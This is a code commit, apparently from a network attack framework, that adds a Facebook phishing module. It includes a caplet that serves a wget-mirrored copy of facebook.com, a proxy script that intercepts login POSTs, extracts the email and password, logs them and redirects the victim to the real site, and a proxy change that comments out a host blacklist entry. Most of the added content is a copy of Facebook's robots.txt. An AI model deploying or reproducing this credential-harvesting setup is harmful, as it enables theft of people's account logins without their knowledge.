new: facebook phishing caplet

caplets/fb-phish.cap

@@ -0,0 +1,7 @@
+set http.server.address 0.0.0.0
+set http.server.path caplets/www/www.facebook.com/
+
+set http.proxy.script caplets/fb-phish.js
+
+http.proxy on
+http.server on

caplets/fb-phish.js

@@ -0,0 +1,51 @@
+
+var RESET = "\033[0m";
+
+function R(s) {
+    return "\033[31m" + s + RESET;
+}
+
+function G(s) {
+    return "\033[32m" + s + RESET;
+}
+
+function B(s) {
+    return "\033[34m" + s + RESET;
+}
+
+function Y(s) {
+    return "\033[33m" + s + RESET;
+}
+
+function DIM(s) {
+    return "\033[2m" + s + RESET;
+}
+
+function BOLD(s) {
+    return "\033[1m" + s + RESET;
+}
+
+function onRequest(req, res) {
+    if( req.Method == "POST" && req.Path == "/login.php" && req.ContentType == "application/x-www-form-urlencoded" ) {
+        var body = req.ReadBody();
+        var parts = body.split('&');
+        var email = "?", pass = "?";
+
+        for( var i = 0; i < parts.length; i++ ) {
+            var nv = parts[i].split('=');
+            if( nv[0] == "email" ) {
+                email = nv[1];
+            } 
+            else if( nv[0] == "pass" ) {
+                pass = nv[1];
+            }
+        }
+    
+        log( R(req.Client), " > FACEBOOK > email:", B(email), " pass:'" + B(pass) + "'" );
+
+        res.Status      = 301;
+        res.Headers     = "Location: https://www.facebook.com/\n" +
+                          "Connection: close";
+        res.Updated()
+    }
+}

caplets/www/Makefile

@@ -0,0 +1,9 @@
+all: facebook
+
+facebook:
+	wget -U "Mozilla/5.0 (Windows NT 5.2; rv:2.0.1) Gecko/20100101 Firefox/4.0.1" -S -r www.facebook.com
+	find www.facebook.com -name "*.html" -print0 | xargs -0 sed -i "s/https:\/\/www.facebook.com//g"
+
+clean:
+	rm -rf www.facebook.com
+

caplets/www/www.facebook.com/robots.txt

@@ -0,0 +1,271 @@
+# Notice: Crawling Facebook is prohibited unless you have express written
+# permission. See: http://www.facebook.com/apps/site_scraping_tos_terms.php
+
+User-agent: Applebot
+Disallow: /ajax/
+Disallow: /album.php
+Disallow: /checkpoint/
+Disallow: /contact_importer/
+Disallow: /feeds/
+Disallow: /file_download.php
+Disallow: /hashtag/
+Disallow: /l.php
+Disallow: /live/
+Disallow: /moments_app/
+Disallow: /p.php
+Disallow: /photo.php
+Disallow: /photos.php
+Disallow: /sharer/
+
+User-agent: baiduspider
+Disallow: /ajax/
+Disallow: /album.php
+Disallow: /checkpoint/
+Disallow: /contact_importer/
+Disallow: /feeds/
+Disallow: /file_download.php
+Disallow: /hashtag/
+Disallow: /l.php
+Disallow: /live/
+Disallow: /moments_app/
+Disallow: /p.php
+Disallow: /photo.php
+Disallow: /photos.php
+Disallow: /sharer/
+
+User-agent: Bingbot
+Disallow: /ajax/
+Disallow: /album.php
+Disallow: /checkpoint/
+Disallow: /contact_importer/
+Disallow: /feeds/
+Disallow: /file_download.php
+Disallow: /hashtag/
+Disallow: /l.php
+Disallow: /live/
+Disallow: /moments_app/
+Disallow: /p.php
+Disallow: /photo.php
+Disallow: /photos.php
+Disallow: /sharer/
+
+User-agent: Googlebot
+Disallow: /ajax/
+Disallow: /album.php
+Disallow: /checkpoint/
+Disallow: /contact_importer/
+Disallow: /feeds/
+Disallow: /file_download.php
+Disallow: /hashtag/
+Disallow: /l.php
+Disallow: /live/
+Disallow: /moments_app/
+Disallow: /p.php
+Disallow: /photo.php
+Disallow: /photos.php
+Disallow: /sharer/
+
+User-agent: ia_archiver
+Disallow: /
+Disallow: /ajax/
+Disallow: /album.php
+Disallow: /checkpoint/
+Disallow: /contact_importer/
+Disallow: /feeds/
+Disallow: /file_download.php
+Disallow: /hashtag/
+Disallow: /l.php
+Disallow: /live/
+Disallow: /moments_app/
+Disallow: /p.php
+Disallow: /photo.php
+Disallow: /photos.php
+Disallow: /sharer/
+
+User-agent: msnbot
+Disallow: /ajax/
+Disallow: /album.php
+Disallow: /checkpoint/
+Disallow: /contact_importer/
+Disallow: /feeds/
+Disallow: /file_download.php
+Disallow: /hashtag/
+Disallow: /l.php
+Disallow: /live/
+Disallow: /moments_app/
+Disallow: /p.php
+Disallow: /photo.php
+Disallow: /photos.php
+Disallow: /sharer/
+
+User-agent: Naverbot
+Disallow: /ajax/
+Disallow: /album.php
+Disallow: /checkpoint/
+Disallow: /contact_importer/
+Disallow: /feeds/
+Disallow: /file_download.php
+Disallow: /hashtag/
+Disallow: /l.php
+Disallow: /live/
+Disallow: /moments_app/
+Disallow: /p.php
+Disallow: /photo.php
+Disallow: /photos.php
+Disallow: /sharer/
+
+User-agent: seznambot
+Disallow: /ajax/
+Disallow: /album.php
+Disallow: /checkpoint/
+Disallow: /contact_importer/
+Disallow: /feeds/
+Disallow: /file_download.php
+Disallow: /hashtag/
+Disallow: /l.php
+Disallow: /live/
+Disallow: /moments_app/
+Disallow: /p.php
+Disallow: /photo.php
+Disallow: /photos.php
+Disallow: /sharer/
+
+User-agent: Slurp
+Disallow: /ajax/
+Disallow: /album.php
+Disallow: /checkpoint/
+Disallow: /contact_importer/
+Disallow: /feeds/
+Disallow: /file_download.php
+Disallow: /hashtag/
+Disallow: /l.php
+Disallow: /live/
+Disallow: /moments_app/
+Disallow: /p.php
+Disallow: /photo.php
+Disallow: /photos.php
+Disallow: /sharer/
+
+User-agent: teoma
+Disallow: /ajax/
+Disallow: /album.php
+Disallow: /checkpoint/
+Disallow: /contact_importer/
+Disallow: /feeds/
+Disallow: /file_download.php
+Disallow: /hashtag/
+Disallow: /l.php
+Disallow: /live/
+Disallow: /moments_app/
+Disallow: /p.php
+Disallow: /photo.php
+Disallow: /photos.php
+Disallow: /sharer/
+
+User-agent: Twitterbot
+Disallow: /ajax/
+Disallow: /album.php
+Disallow: /checkpoint/
+Disallow: /contact_importer/
+Disallow: /feeds/
+Disallow: /file_download.php
+Disallow: /hashtag/
+Disallow: /l.php
+Disallow: /live/
+Disallow: /moments_app/
+Disallow: /p.php
+Disallow: /photo.php
+Disallow: /photos.php
+Disallow: /sharer/
+
+User-agent: Yandex
+Disallow: /ajax/
+Disallow: /album.php
+Disallow: /checkpoint/
+Disallow: /contact_importer/
+Disallow: /feeds/
+Disallow: /file_download.php
+Disallow: /hashtag/
+Disallow: /l.php
+Disallow: /live/
+Disallow: /moments_app/
+Disallow: /p.php
+Disallow: /photo.php
+Disallow: /photos.php
+Disallow: /sharer/
+
+User-agent: Yeti
+Disallow: /ajax/
+Disallow: /album.php
+Disallow: /checkpoint/
+Disallow: /contact_importer/
+Disallow: /feeds/
+Disallow: /file_download.php
+Disallow: /hashtag/
+Disallow: /l.php
+Disallow: /live/
+Disallow: /moments_app/
+Disallow: /p.php
+Disallow: /photo.php
+Disallow: /photos.php
+Disallow: /sharer/
+
+User-agent: Applebot
+Allow: /ajax/pagelet/generic.php/PagePostsSectionPagelet
+Allow: /safetycheck/
+
+User-agent: baiduspider
+Allow: /ajax/pagelet/generic.php/PagePostsSectionPagelet
+Allow: /safetycheck/
+
+User-agent: Bingbot
+Allow: /ajax/pagelet/generic.php/PagePostsSectionPagelet
+Allow: /safetycheck/
+
+User-agent: Googlebot
+Allow: /ajax/pagelet/generic.php/PagePostsSectionPagelet
+Allow: /safetycheck/
+
+User-agent: ia_archiver
+Allow: /about/privacy
+Allow: /ajax/pagelet/generic.php/PagePostsSectionPagelet
+Allow: /full_data_use_policy
+Allow: /legal/terms
+Allow: /policy.php
+Allow: /safetycheck/
+
+User-agent: msnbot
+Allow: /ajax/pagelet/generic.php/PagePostsSectionPagelet
+Allow: /safetycheck/
+
+User-agent: Naverbot
+Allow: /ajax/pagelet/generic.php/PagePostsSectionPagelet
+Allow: /safetycheck/
+
+User-agent: seznambot
+Allow: /ajax/pagelet/generic.php/PagePostsSectionPagelet
+Allow: /safetycheck/
+
+User-agent: Slurp
+Allow: /ajax/pagelet/generic.php/PagePostsSectionPagelet
+Allow: /safetycheck/
+
+User-agent: teoma
+Allow: /ajax/pagelet/generic.php/PagePostsSectionPagelet
+Allow: /safetycheck/
+
+User-agent: Twitterbot
+Allow: /ajax/pagelet/generic.php/PagePostsSectionPagelet
+Allow: /safetycheck/
+
+User-agent: Yandex
+Allow: /ajax/pagelet/generic.php/PagePostsSectionPagelet
+Allow: /safetycheck/
+
+User-agent: Yeti
+Allow: /ajax/pagelet/generic.php/PagePostsSectionPagelet
+Allow: /safetycheck/
+
+User-agent: *
+Disallow: /
+

modules/http_proxy.go

@@ -120,7 +120,7 @@ func (p *HttpProxy) doProxy(req *http.Request) bool {
 	blacklist := []string{
 		"localhost",
 		"127.0.0.1",
-		p.address,
+		// p.address,
 	}
 
 	if req.Host == "" {